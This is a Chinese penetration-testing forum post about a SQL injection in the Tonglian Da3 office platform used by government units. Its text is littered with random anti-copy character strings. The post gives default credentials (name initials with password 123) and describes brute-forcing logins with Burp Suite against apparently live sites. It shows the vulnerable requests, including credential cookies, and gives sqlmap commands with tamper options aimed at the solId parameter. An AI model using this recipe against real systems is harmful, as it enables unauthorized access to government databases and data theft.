中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

( f2 w8 ^; p6 T. {) R. ~
& C- K( Y, _5 i8 T

+ E; I4 P$ [, I2 e E; @

* w. Q* D$ @5 E; S 平台简介: ! J' }7 |+ ?$ @$ b5 {/ i

3 @/ P) N1 C9 e

4 M- d& q5 x" s% T1 O/ |  0 x) l0 [7 h+ S+ g3 O$ b6 w5 Q

* q$ D) e6 o0 a9 b* y

2 e1 W0 D3 S- _1 @2 {# v 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! n" w. ^, @7 Q1 F+ a+ d0 J同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 X( K$ s- m4 T9 ?同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!) W& z) H4 D5 T/ I f' i

& ^1 k$ a$ D. q' L

8 L) u! b' s% S: m  , [; `8 \: g& Y0 Q; k( K

- L+ y: B, Z% T" U: Z$ l

$ }0 a9 M, d- @ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: & }( {, v L7 v" P0 P

% L) {0 m5 J/ X4 `2 a4 i0 a

. l9 O# u3 e" I; M! i8 j4 }( V  " z3 X. i4 u- J

. Z; ?# r- ]2 [# G0 ~8 g

+ M$ o2 a @; x |+ ? http://1.1.1.1:7197/cap-aco/#(案例2-) % b# H h+ J& O6 k N& D

2 T7 [: |2 T& r+ \

: N" y O) s2 j9 ~# z$ ?: I http://www.XXOO.com (案例1-官网网站) + z- k. n, E5 ^" B, q( S! ^2 }' N

; @' O8 L9 k8 `# l& V

* M$ [1 |1 s" Y5 L2 A5 t) K: f2 N  0 k; L2 v! u4 R2 i9 X

( v* ~( p9 `9 k6 }

" K+ f x9 w6 k8 P+ Q) \5 u- L 漏洞详情:6 e* k- w8 F; x! M4 l" O" ~/ k

1 ^! b! a% Q9 l3 ~' p$ Y& c! k7 W* Y

9 ? ^- n+ R; o2 E  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 * o6 Q+ V e& R+ W' G% m- J+ Y

; A( t7 F. B; j* R6 {2 A/ T3 t

/ ~" i( l- r$ C( \: ^" }      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:9 g N& |5 }& Q7 p

* V( T" K% g* G, k/ p l

( D1 U) g+ K/ x B2 h# F3 r   5 J( P8 U$ [3 C0 a8 K

& G0 p; r$ _; p9 b9 ~

2 f, }: [$ J4 ?# q( Z0 C  " y5 s: t' ^3 ~5 J1 l

. O, X+ {) Y$ N/ w: ^, r

: G- }2 ]6 X# m+ _+ ~# m status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: ! z9 ~6 V {1 `4 T! {+ ]) v

# w8 ?8 _3 P8 m! u& j

$ [4 b) X7 n) {$ S 1、案例1-官方网站 6 U: _+ s1 Y8 k4 V9 R

, ^ Z' S/ `4 c6 ^

- t( ?8 s" T/ q: [' m4 C GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 : o/ |( h( R5 u& I. k" a

4 u b" @# j2 f) Z* | x3 p0 m

& g. S6 C1 ?6 v0 F! g( w* B Host: www.XXOO.com ' ]6 x. M# \; H0 s

' V1 U! C3 a+ n5 V

' R, G4 H9 `+ t3 g# o Proxy-Connection: Keep-Alive . d. p- n: p7 g# }

/ J. [( u: F8 L; G/ n* X. a

- v" o# K0 v6 _: { Accept: application/json, text/javascript, */*; q=0.013 y! Z6 J: H/ y3 M# X4 o

/ E5 u" W, L! w6 {# j* O

- ^) P. {" q: \1 Y Accept-Language: zh-CN 9 U3 w1 c: O; ~( v% s0 }+ S9 L% U

! F7 {) S }5 N7 M3 o

% @0 o/ y. A2 L4 W+ p: f& n- ~ Content-Type: application/json L- x9 f X3 x

% ~; R5 [ B+ ]' ]# o3 G$ u: m

; r0 k$ r* k, ^; e: {5 {5 J; ]" v User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko & G4 j! K4 Z0 d8 M8 r, W9 ~

; M. ]) q( e2 j7 r5 C7 B# l

$ O6 {8 i7 i2 ] P: j5 x. p# ` X-Requested-With: XMLHttpRequest " [% i0 P; H- M

+ o% Z) f$ s$ T& B

8 e+ i" ~! K% p, j, u _ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 7 y9 I, i3 G h8 c4 {' a

1 v* |0 T( H/ M0 Q: Y

+ H9 d: S# m# C+ P& H: a& v1 S Accept-Encoding: gzip, deflate, sdch + J* ^ O" X+ x

2 t2 }9 y0 n5 t; a0 f ^/ D4 b6 z

" u4 d! J/ z8 y, F2 A. O/ ~ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e8 N! a( D6 T2 V+ |

4 c7 A3 [0 e J1 n2 z$ s& h& G$ ?2 b& j

1 M0 w5 g. X2 e; O! Z* ^ n7 i 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 8 f4 d' N) S) f

; E" o. O/ T# j0 Z t2 U2 s

& T; N. S2 `0 o4 Z1 @6 B4 S8 Q  6 ~: k$ G! [8 @5 Q: _2 f

+ s- S4 I3 Z7 I( d) w% G5 X* q

^ A6 S, a5 X" J2 k s) v2 n   8 B' _3 m* u b- ?1 b* K$ C' j) ]) f

! b, @9 L2 g6 a( l

( ^( o% i: ^" C1 a0 d   " Y! e4 i# W4 h+ K+ Z3 P3 \; W

: b8 |! u8 {) U P0 M d& s

+ e7 I; ~) W) ^! a! y  * _! M! t$ T: {: P& ]

6 {- e8 w) |; U2 O

& ^. T) J1 f7 g5 F0 b   $ M9 N( }! y) T+ b4 t- O3 V; j5 |

0 M) S8 ^8 [3 m: ]% A& P; k) N

2 `8 }: n' o S7 l9 l4 C3 @ 2、案例2-某天河云平台 7 E8 z% J/ S3 m# k+ i$ q

1 Y3 H3 A: v6 m" S

: |. N. _( ~& H! ? GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.12 m, U" u9 T: M! l" A# d

& Z2 G( n' Z' x) k, X& {

) [. }; q" C6 {( ?0 k) { Host: 1.1.1.:7197 4 p$ _( Q r) N( ^

; U* w& I- a4 E6 |

2 x# y- S/ r4 I: k# N/ T Accept: application/json, text/javascript, */*; q=0.01 - M% e6 ^) m ^! S9 }9 p' h

+ J' A1 N4 j# j+ W4 @, T3 o; p

4 a, d% I# X4 t7 u! [0 U# O, i X-Requested-With: XMLHttpRequest 0 s* ~( e5 o g: E3 f. [

' W) `1 @6 v- J2 h+ |) J! J- Z

6 x; P, U, b% H User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0' d( [0 W, T! K y* z2 X

9 Y6 Z& a+ Q' m# Z3 V7 Z: ]- E

! @& \0 j+ b( l) ~0 a1 p Content-Type: application/json ( h6 ^ o: T# t5 _* T" B1 r

f o7 f( W0 }! s

5 M) n- @2 J0 h l- s2 j Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10081 G5 u9 S5 b5 s2 }* ~( C3 ~5 c) y

; ?! x2 C* s: d, ?

' ^+ c! a1 j1 v5 t" c( f) P0 {# W Accept-Language: zh-CN,zh;q=0.8* O8 r; d( A6 ^0 U/ x" S

. @- t" n9 I& T& R

) a4 @" I9 Z$ H# H# G Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=18 z; ~" F) v; j2 B) o6 J) Z4 N; b

1 u: i1 `5 h# M7 v% y

4 H7 T# o% D4 i( r5 w% Z# h/ D Connection: close) j: {0 b' s# A# ]0 R/ o0 _

c2 j$ u$ b3 {+ `+ R

/ W9 L! M$ J- \8 l 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* v, U1 p; r8 C

% y: f1 v" D! C( N0 v% ~

8 o2 m" \8 V4 N1 o   # T; T0 H4 T+ s- V Y4 I( e2 t& z1 s

% O* L4 J+ v5 q+ ?1 |' [! Z

* Y. \ i( u7 D9 H5 n
L, @" m P9 C( Z






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2